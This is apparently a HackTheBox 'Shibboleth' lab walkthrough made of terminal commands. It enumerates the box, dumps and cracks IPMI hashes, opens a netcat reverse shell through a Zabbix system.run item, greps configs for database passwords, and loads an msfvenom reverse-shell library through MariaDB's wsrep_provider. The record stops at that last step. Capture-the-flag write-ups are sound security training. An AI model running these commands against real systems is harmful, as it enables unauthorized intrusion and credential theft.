HackTheBox – Shibboleth Walkthrough – In English
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.124
┌──(rootkali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.11.124
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -u http://shibboleth.htb/FUZZ -t 100 -sf -e php,txt,html,js -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -ic -c
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -u http://shibboleth.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -H “Host:FUZZ.shibboleth.htb” –fc 302
┌──(rootkali)-[/home/kali/Downloads]
└─# echo “10.10.11.124 monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb” | sudo tee -a /etc/host
This was Zabbix Login Page. A quick google search told that the default credential was Admin:zabbix
.
But this credential is not working.
Finally, spending a lot of time on port 80 I started a UDP scan which gives me one open port i.e 623.
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -sU -sC -sV shibboleth.htb -T4
It looks like port 623/UDP
is an IPMI port used for embedded device management. I’ve never heard of it before so I look for exploits!
msf6 > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHoSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
Hash:
Administrator:02fb08888201000033e2f01b8b8b8d0b1616ff5ea39d8db4c975925effd3d2a2eeb9b3cf483e1f91a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:440767ae6339a2523a033995b3fe41128cb0321b
┌──(rootkali)-[/home/kali/Downloads]
└─# hashcat -m 7300 hash.txt /home/kali/Downloads/rockyou.txt
Username: Administrator
Password : ilovepumkinpie1
Navigate to Configuration → Hosts you will see the host mentioned. Now hosts have different types of tags like triggers, items, web, etc. We are interested in items tag.
Click on items → click on “Create items”
Key: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 1234 >/tmp/f,nowait]
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 1234
Now start an NC listener and click on the “test” button →“get value” and we have a shell.
$ cat /etc/passwd
$ cd /home
$ ls
$ cd ipmi-svc
$ ls
$ cat user.txt
$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc
ipmi-svc@shibboleth:/etc/zabbix$ netstat –antp
Once we have access to the user flag and the user account, I see that MySQL is running, and start grepping for passwords. I find it in the /etc/zabbix
directory.
ipmi-svc@shibboleth:~$ grep -iR ‘password’ /etc/zabbix/ 2>/dev/null
DBPassword=bloooarskybluh
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix
Enter password: bloooarskybluh
┌──(rootkali)-[/home/kali/Downloads]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.102 LPORT=4001 -f elf-so -o test.so
┌──(rootkali)-[/home/kali/Downloads]
└─# python -m http.server 80
MariaDB [zabbix]> quit
ipmi-svc@shibboleth:/etc/zabbix$ cd /tmp
ipmi-svc@shibboleth:/tmp$ wget http://10.10.14.102/test.so
ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -p -D zabbix
Enter password: bloooarskybluh
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 4001
MariaDB [zabbix]> SET GLOBAL wsrep_provider=”/tmp/test.so”;